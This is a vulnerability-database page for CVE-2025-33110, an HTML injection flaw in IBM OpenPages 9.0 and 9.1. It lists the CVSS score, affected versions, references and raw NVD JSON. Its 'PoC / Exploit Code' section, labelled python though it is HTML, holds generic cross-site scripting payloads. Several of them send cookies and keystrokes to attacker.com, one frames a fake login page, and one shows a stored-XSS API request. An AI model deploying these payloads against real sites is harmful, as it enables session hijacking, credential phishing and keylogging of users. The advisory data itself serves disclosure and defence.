CVE-2025-33110

Description

IBM OpenPages 9.1, and 9.0 with Watson is vulnerable to HTML injection. A remote attacker could inject malicious HTML code, which when viewed, would be executed in the victim's Web browser within the security context of the hosting site.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:ibm:openpages:9.0.0:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:ibm:openpages:9.1.0:*:*:*:*:*:*:* - VULNERABLE

IBM OpenPages 9.1

IBM OpenPages 9.0 with Watson

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CVE-2025-33110 HTML Injection PoC -->
<!-- Target: IBM OpenPages 9.0/9.1 -->
<!-- This PoC demonstrates HTML injection in user input fields -->

<!-- Basic HTML Injection Payload -->
<script>alert('XSS - CVE-2025-33110')</script>

<!-- Cookie Stealing Payload -->
<img src=x onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)">

<!-- Session Hijacking Payload -->
<script>
document.write('<img src="https://attacker.com/log?cookie='+document.cookie+'&url='+window.location.href+'">');
</script>

<!-- Phishing Payload -->
<iframe src="https://attacker.com/fake-login.html" width="100%" height="100%"></iframe>

<!-- Keylogger Payload -->
<script>
document.onkeypress=function(e){
  fetch('https://attacker.com/log?key='+e.key);
}
</script>

<!-- Image Tag Bypass Payload -->
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">

<!-- SVG Payload -->
<svg onload="fetch('https://attacker.com/exfil?data='+document.cookie)">

<!-- Stored XSS via API -->
<!-- POST /api/submit-data HTTP/1.1 -->
<!-- Content-Type: application/json -->
<!-- {"field": "<script>alert(document.domain)</script>"} -->

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-33110
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-33110
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-33110/
[4] VulDB https://vuldb.com/cve/CVE-2025-33110
[5] https://www.ibm.com/support/pages/node/7250321

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-33110", "sourceIdentifier": "[email protected]", "published": "2025-11-06T21:15:42.157", "lastModified": "2025-11-24T15:27:56.667", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM OpenPages 9.1, and 9.0 with Watson is vulnerable to HTML injection. A remote attacker could inject malicious HTML code, which when viewed, would be executed in the victim's Web browser within the security context of the hosting site."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-80"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:openpages:9.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "F8ACBB76-355D-43F6-851E-0B79EE52AC19"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:openpages:9.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "F78E4CFE-31E7-4FFF-8DB4-6D7AC69A2248"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7250321", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}